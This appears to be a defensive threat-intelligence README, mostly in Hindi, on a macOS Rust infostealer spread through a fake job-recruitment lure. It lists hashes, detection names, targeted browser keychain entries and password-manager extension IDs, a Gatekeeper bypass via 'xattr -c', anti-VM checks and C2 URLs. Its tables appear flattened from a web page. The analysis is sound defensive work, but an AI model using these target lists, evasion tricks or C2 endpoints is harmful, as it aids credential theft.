dpdmipjakdiapplcecdmgckknipnfjph  dpealdfjgahljjdekeiadjnfgpijffhg
dpmfhilhjlhhakpbieclcghochdofeao  eaeecbmeajhliilmacefcgjnnijkkfki
ebaeifdbcjklcmoigppnpkcghndhpbbm  ebfidpplhabeedpnhjnobghokpiioolj
efbglgofoippbgcjepnhiblaibcnclgk  egjidjbpglichdcondbcbdnbeeppgdph
ehgjhhccekdedpbkifaojjaefeohnoea  ehjiblpccbknkgimiflboggcffmpphhp
ejbalbakoplchlghecdalmeeeajnimhm  ejbidfepgijlcgahbmbckmnaljagjoll
ejdmhlhkcfbkcoifejkcbonhodkgflgg  ejjladinnckdgjemekebdpeokbikhfci
elalghlhoepcjfaedkcmjolahamlnjcp  eljobehkpcnpekmbcjiidekjhkbcnpkf
ellkdbaphhldpeajbepobaecooaoafpg  emafjfadeeammocialbgjbaeldmpddne
emeeapjkbcbpbpgaagfchmcgglmebnen  emgcpdnckldpdhjgmkeeahfaokmhgpab
enabgbdfcbaehmbigakijjabdpdnimlg  epapihdplajcdnnkdeiahlgigofloibg
fajmdbbmcncahahilpfdiacamedmgdlk  fbplgegfggencanbeceipjpanlmgpkfi
fcckkdbjnoikooededlapcalpionmalo  fcfcfllfndlomdhbehjjcoimbgofdncg
fcjkomdnccnlklmhncgmaehaakjkddnk  fdchdcpieegfofnofhgdombfckhbcokj
fdcnegogpncmfejlfnffnofpngdiejii  fdjamakpfbbddfjaooikfcpapjohcfmg
fhbohimaelbohpjbbldcngcnapndodjp  fhilaheimglignddkjgofkcbgekhenbh
fhmmkjofdcpnoklcbcnbjjhigobceikb  fihkakfobkmkjojpchpfgcmhfjnmnfpi
fijngjgcjhjmmpcmkeiomlglpeiijkld  fjghjobbfggoacelnibacipoilennobn
fldfpgipfncgndfolcbkdeeknbbbnhcc  fmpbldieijjehhalgjblbpgjmijencll
fnabdmcgpkkjjegokfcnfbpneacddpfh  fnjhmkhhmkbjkkabndcnnogagogbneec
fnnegphlobjdpkhecapkijjdkgcjhkib  fopmedgnkfpebgllppeddmmochcookhc
fpibioaihcagphbidhodidjbnclocgll  fpkhgmpbidmiogeglndfbkegfdlnajnf
gbjepgaebckfidagpfeioimheabiohmg  gdokollfhmnbfckbobkdbakhilldkhcj
gejiddohjgogedgjnonbofjigllpkmbf  ghihpcdpbjaaomhlfnhdlocimojkinpm
ghlmndacnhlaekppcllcpcjjjomjkjpg  ghmbeldphafepmbegfdlkpapadhbakde
gjlmehlldlphhljhpnlddaodbjjcchai  gkeelndblnomfmjnophbhfhcjbcnemka
gkhnjcpkikkkfhhdhhphcbhmkikoicgn  gkpbmnplcjdnnmmiaaphofhdiicdhfah
glhefpglgefbmegkpjkdgoikologepdl  hbbgbephgojikajhfbomhlmmollphcad
hbdheoebpgogdkagfojahleegjfkhkpl  hbinmkhlebcnghpikoekkbeljbealbje
hbneiaclpaaglopiogfdhgccebncnjmc  hbnpcbochkgodkmmicbhfpmmkhbfbhim
hddkffjleepiafmkhcneldjipkfkkofk  hdokiejnpimakedhajhdlcegeplioahd
heefohaffomkkkphnlpohglngmbcclhi  hgbeiipamcgbdjhfflifkgehomnmglgk
hgnpaljkalilofmmbhgkkldbdbogddlo  hifafgmccdpekplomjjkcfgodnhcellj
hlbmghfhijdlnllnnnakmcagdfhhkfna  hmeobnfnfcmdkdcmlblgagmfpfboieaf
hnfanknocfeofbddgcijnmhnfnkdnaad  hnhobjmcibchnmglfbldbfabcgaknlkj
hpbgcgmiemanfelegbndmhieiigkackl  hpclkefagolihohboafpheddmmgdffjm
hpglfhgfnhbgpjdenjgmdgoeiappafln  hpjiiechbbhefmpggegmahejiiphbmij
ibjflpbmadchofnbpppegdbnifdgincp  ibljocddagjghmlpgihahamcghfggcjc
ibnejdfjmmkpcnlpebklmnkoeoihofec  icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
idnnbdplmphpflfnlkomgpfbpcgelopg  idpfplgehakelkdadhcacicjjbemjbke
ifckdpamphokdglkkdomedpdegcjhjdp  ifclboecfhkjbpmhgehodcjpciihhmif
ifgjklbmlnimhldbmddmkdhoahfocppf  ikcpjgihikfinlkobegiiogdigohmfam
ilhaljfiglknggcoegeknjghdgampffk  imlcamfeniaidioeflifonfjeeppblda
iokeahhehimjnekafflcihljlcjccdbe  jaooiolkmfcmloonphpiiogkfckgciom
jbdaocneiiinmjbjlgalhcelgbejmnid  jccapkebeeiajkkdemacblkjhhhboiek
jfdlamikmbghhapbgfoogdffldioobgl  jfflgdhkeohhkelibbefdcgjijppkdeb
jhjebgdkdemiibiibgickfkilfpbelaj  jhnilbocebbmeelaolalihfokjgdmogb
jicpmdkafljkkppgpellcjhfhdmjpogm  jiepnaheligkibgcjgjepjfppgbcghmp
jiidiaalihmmhddjgbnbgdfflelocpak  jjkhekbaikcnpnhflnnlnbonkkobkiim
jljjeghmeihjegifdhbghcoihdiegkkl  jmgipjhlmabpmcikcahmmgleghckefjg
jnggcdmajcokeakpdeagdhphmkioabem  jnldfbidonfeldmalbflbmlebbipcnle
jnlgamecbpmbajjfhmmmlhejkemejdma  jojhfeoedkpkglbfimdfabpdfjaoolaf
kdgponmicjmjiejhifbjgembdcaclcib  keenhcnmdmjjhincpilijphpiohdppno
kfdniefadaanbjodldohaedphafoffoh  kgdijkcfiglijhaglibaidbipiejjfdp
khgocmkkpikpnmmkgmdnfckapcdkgfaf  khpkpbbcccdmmclmpigdgddabeilkdpd
kilnpioakcdndlodeeceffgjdpojajlo  kjjebdkfeagdoogagbhepmbimaphnfln
kkpehldckknjffeakihjajcjccmcjflh  kkpllbgjhchghjapjbinnoddmciocphm
kkpllkodjeloidieedojogacfhpaihoh  klghhnkeealcohjjanjjdaeeggmfmlpl
kmphdnilpmdejikjdnlbcnmnabepfgkh  kncchdigobghenbbaddojjnnaogfppfj
kolfcecahpbgbilkdkalabnfjjklkkae  kpfopkelmapcoipemfendmdcghnegimn
kppfdiipphfccemcignhifpjkapfbihd  kppgpfphbmbcgeglphjnhnhibonmebkn
lccbohhgfkdikahanoclbdmaolidjdfl  ldcihfaojdpmhjkhioilfjjckehehddg
lfmmjkfllhmfmkcobchabopkcefjkoip  lgmpcpglpngdoalbgeoldeajfclnhafa
lkpmkhpnhknhmibgnmmhdhgdilepfghe  llakdhpogpnejheknjbhbadoaomejgbi
lmkncnlpeipongihbffpljgehamdebgi  lnnnmfcpbkafcpgdilckhmhbkkbpkmid
loinekcabhlmhjjbocijdoimmejangoa  lpfcbjknijpeeillifnkikgncikgfhdo
lpilbniiabackdjcionkobglmddfbcjo  magbanejlegnbcppjljfhnmfmghialkl
mapbhaebnddapnmifbbkgeedkeplgjmf  mcbigmjiafegjnnogedioegffbooigli
mcohilncbfahbmgdjkbpemcciiolgcge  mdjjoodeandllhefapdpnffjolechflh
mdjmfdffdcmnoblignmgpommbefadffd  mdnaglckomeedfbogeajfajofmfgpoae
mfgccjchihfkkindfppnaooecgfneiii  mfiealgchgibibbamfjebflnfjihfedk
mgbfflhghaohmaecmaggieniidindaoc  mgfbabcnedcejkfibpafadgkhmkifhbd
mgffkfbidihjpoaomajlbgchddlicgpn  mjgkpalnahacmhkikiommfiomhjipgjn
mkchoaaiifodcflmbaphdgeidocajadp  mkjjflkhdddfjhonakofipfojoepfndk
mkpegjkblkkefacfnmkajcjmabijhclg  mlbnicldlpdimbjdcncnklfempedeipj
mlhakagmgkmonhdonhkpjeebfphligng  mmmjbcfofconkannjonfmjjajpllddbg
mnfifefkajgofkcjkemidiaecocnkjeh  mnnkpffndmickbiakofclnpoiajlegmg
modjfdjcodmehnpccdjngmdfajggaoeh  nanjmdknhkinifnkgdcggcfnhdaammmj
nankopfjhdflikcokhgohiaoehnjfako  nbdhibgjnjpnkajaghbffjbkcgljfgdi
nbdpmlhambbdkhkmbfpljckjcmgibalo  nebnhfamliijlghikdgcigoebonmoibm
nfaepmamdapehcbedhejbjcpnlcldodi  nfinomegcaccbhchhgflladpfbajihdf
ngakogceekkandcbkniokoghdckjhhok  nglnaekfdaelelcaokeemlnopjhekdkj
nhlnehondigmgckngjomcpcefcdplmgc  nhnkbkgjikgcigadomkphalanndcapjk
niiaamnmgebpeejeemoifgdndgeaekhe  njoljnomkdoakfphjbapdopdcneceeaf
nkbihfbeogaeaoehlefnkodbefgpgknn  nkddgncdjgjfcddamfgcmfnlhccnimig
nknhiehlklippafakaeklbeglecifhad  nlbmnnijcnlegkjjpcfjclmcfggfefdm
nlgnepoeokdfodgjkjiblkadkjbdfmgd  nopnfnlbinpfoihclomelncopjiioain
nphplpgoakhhjchkkhmiggakijnkhfnd  ocjdpmoallmgmjbbogfiiaofphbjgchh
ocjobpilfplciaddcbafabcegbilnbnb  ocmccklecaalljlflmclidjeclpcpdim
odbfpeeihdkbihmopkbjmoonfanlbfcl  oehdbmfbnjnpahadljbdcjndmepmgjgl
ofeeamlegilfbjlgbephmdhchpblfigo  ohjgojhmjldjfiningdelbffpnddmiphh
ojggmchlghnjlapmfbnjholfjkiidbch  oklkeijlcjcpbokmkmnjepjhnggkfkcl
oldojieloelkkfeacfinhcngmbkepnlm  olgpchjlegmakkhfbahgnjojlefnealp
olkbchllhcflpbjfgagahpkjnjioiedg  omaabbefbmiijedngplfjmnooppbclkk
omajpeaffjgmlpmhbfdjepdejoemifpe  onhogfjeacnfoofkfgppdlbmlmnplgbn
ooiepdgjjnhcmlaobfinbomgebfgablh  ookjlbkiijinhpmnjffcofjonbfbgaoc
opcgpfmipidbgpenhmajoajpbobppdil  oponnjpnbhdmohlkonljdfhbeibljfoa
oppceojapmdmhpnmjpballbbdclocdhj  panpgppehdchfphcigocleabcmcgfoca
pdadjkfkgcafgbceimcpbkalnfnepbnk  pdgbckgdncnhihllonhnjbdoighgpimk
pdliaogehgdbhbnmkklieghmmjkpigpa  pdlocjdlejekdbpghdcmedeacpkfiiof
peigonhbenoefaeplkpalmafieegnapj  penjlddjkjgpnkllboccdgccekpkcbin
pgiaagfkgcbnmiiolekcfmljdagdhlcm  pgojdfajgcjjpjnbpfaelnpnjocakldb
phkbamefinggmakgklpkljjmgibohnba  pmmbeeacafhbpgmlkacpadheejlhhkbf
pnndplcbkakcplkjnolgbkdgjikjednm  pnphepacpjpklpbacfmebicbgndobakn
pocmplpaccanhmnllbbkpgfliimjljgo  pogabilnghhbafaheaepaaeopjpleimd
ppbibelpcjmhbdihakflkdcoccbgbkpo  ppdadbejkmjnefldpcdjhnkpbjkikoip

दायरा और सीमाएँ

  • यह रिपॉजिटरी एक एकल मैलवेयर नमूने और उसके एम्बेडेड कॉन्फ़िगरेशन के स्टैटिक विश्लेषण और डिक्रिप्शन का दस्तावेजीकरण करती है।
  • अभियान का श्रेय विश्लेषणात्मक है, जो पुनर्प्राप्त बुनियादी ढांचे और TTP ओवरलैप पर आधारित है; यह कानून प्रवर्तन का श्रेय कथन नहीं है।
  • सूचीबद्ध Chrome एक्सटेंशन ID डेटा चोरी के लिए लक्षित वैध एक्सटेंशन की पहचान करते हैं, दुर्भावनापूर्ण एक्सटेंशन नहीं।
  • उत्पादन में तैनाती से पहले डिटेक्शन नियमों को गंतव्य वातावरण में मान्य और ट्यून किया जाना चाहिए।
  • STIX बंडल STIX 2.1 का अनुसरण करता है लेकिन पठनीयता के लिए सरलीकृत ID का उपयोग करता है; यदि डीकॉन्फ्लिक्शन की आवश्यकता हो तो उत्पादन CTI प्लेटफॉर्म में आयात करने से पहले UUID पुनः उत्पन्न करें।

रिलीज़ इतिहास

संस्करणित अपडेट के लिए CHANGELOG.md देखें।

योगदान

दिशानिर्देश, मुद्दा टेम्पलेट और PR चेकलिस्ट के लिए CONTRIBUTING.md देखें।

लाइसेंस

विश्लेषण पाठ और स्क्रिप्ट MIT License के तहत जारी किए गए हैं। IOC सूचियाँ और खतरा-खुफिया सामग्री रक्षात्मक उद्देश्यों के लिए प्रदान की गई हैं; लाइसेंस शर्तों के तहत वाणिज्यिक उत्पादों में पुन: उपयोग की अनुमति है।


सैंडबॉक्स्ड वातावरण में स्वतंत्र रिवर्स इंजीनियरिंग। एन्क्रिप्टेड कॉन्फ़िगरेशन को स्टैटिक विश्लेषण और प्रति-हेल्पर CPU अनुकरण द्वारा पुनर्प्राप्त किया गया। scripts/decrypt_all.py और SECURITY.md देखें।

टूल डाउनलोड करें
फ़ाइलप्रारूपउद्देश्य
iocs.txtसादा पाठहैश, डोमेन, URL, आईपी, ईमेल, Sentry ID — ब्लॉकलिस्ट, MISP, OpenCTI में पेस्ट करें
yara_rules.yarYARA 4.2+ज्ञात-नमूना हैश मिलान + Mach-O के लिए ह्यूरिस्टिक स्ट्रिंग डिटेक्शन
sigma_rules.ymlSigmaप्रॉक्सी, DNS, और प्रक्रिया-निर्माण नियम — अपने SIEM के लिए logsource ट्यून करें
stix/bundle.jsonSTIX 2.1मशीन-पठनीय CTI बंडल जिसमें संकेतक, मैलवेयर SDO, बुनियादी ढांचा, ATT&CK पैटर्न और संबंध शामिल हैं
attack-navigator-layer.jsonATT&CK Navigatorदृश्य तकनीक कवरेज के लिए ATT&CK Navigator में आयात करें
तत्वविवरण
प्लेटफ़ॉर्मWellfound (AngelList) — वैध जॉब बोर्ड
कंपनी का नाम"HyperHive" (एकवचन) / डोमेन hyperhives.net
व्यक्तित्व"Felix"
संपर्क ईमेल[email protected]
विश्वास निर्माणलक्ष्य के वास्तविक CV, LinkedIn और विशिष्ट तकनीकी कौशल का उल्लेख किया गया
बहाना"साक्षात्कार से पहले उत्पाद की समीक्षा करें"
पेलोड ट्रिगरhyperhives.net पर "सेटिंग्स → डायग्नोस्टिक्स → लॉग" जांचें
शेड्यूलिंगतात्कालिकता बनाए रखने के लिए नकली साक्षात्कार स्लॉट (8 अप्रैल, 15:00 UTC)
बहु-चरणीय श्रृंखलापेलोड डिलीवरी से पहले 2 दिनों में कम से कम 2 ईमेल
गुणमान
फ़ाइलinstaller_binary
आकार8,504,768 बाइट्स
प्रारूपMach-O Universal (x86_64 + arm64)
SHA-2565c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
SHA-12de897066c2fc7db91da78d7f9ded99237345077
MD50e95ab4038ec48657563c96bed840dd5
कंपाइलरrustc 1.87.0 (स्थिर)
बिल्ड उपयोगकर्ताrootr (एम्बेडेड पथ /Users/rootr/.cargo/registry/... से)
बिल्ड कोडनेमforce
बिल्ड संस्करण9.12.1
त्रुटि ट्रैकिंगSentry Rust SDK v0.36.0
क्रेट गणना97 (देखें output/cargo_dependencies.txt)
इंजनपता लगाने का नाम
KasperskyHEUR:Trojan-PSW.OSX.HashBreaker.e
DrWebMac.PWS.JobStealer.1
ESET-NOD32OSX/PSW.Agent.BX Trojan
MicrosoftTrojan:MacOS/Stealer!AMTB
Avast / AVGMacOS:Stealer-BU [Trj]
ElasticMalicious (high Confidence)
CynetMalicious (score: 99)
SentinelOneStatic AI - Suspicious Mach-O
ब्राउज़रडेटा पथकीचेन एंट्री
ChromeGoogle/ChromeChrome Safe Storage
BraveBraveSoftware/Brave-BrowserBrave Safe Storage
OperadefaultOpera Safe Storage
Opera GXdefaultOpera Safe Storage 2023
VivaldidefaultVivaldi Safe Storage
Microsoft EdgedefaultMicrosoft Edge Safe Storage
ArcArc/User Data—
CocCocdefaultCocCoc Safe Storage
उत्पादएक्सटेंशन आईडी (उदाहरण)
1Passwordaeblfdkhhhdcdjpifhhbdiojplfjncoa, khgocmkkpikpnmmkgmdnfckapcdkgfaf, gejiddohjgogedgjnonbofjigllpkmbf
ProtonPassghmbeldphafepmbegfdlkpapadhbakde
Dashlanefdjamakpfbbddfjaooikfcpapjohcfmg
Deloitte Credentialsकॉर्पोरेट क्रेडेंशियल स्टोर
is_vm
फ़ोर्स मोडforce_mode रिमोट ओवरराइड फ़्लैग
गेटकीपर बायपासडाउनलोड किए गए बाइनरी पर xattr -c
वीपीएन जागरूकता"कृपया VPN का उपयोग करें और पुनः प्रयास करें" त्रुटि संदेश
टेलीमेट्री
https://cloudproxy.link/m/decodeनिर्देश / कॉन्फ़िग चैनल
https://cloudproxy.link/db/debugडीबग / डायग्नोस्टिक्स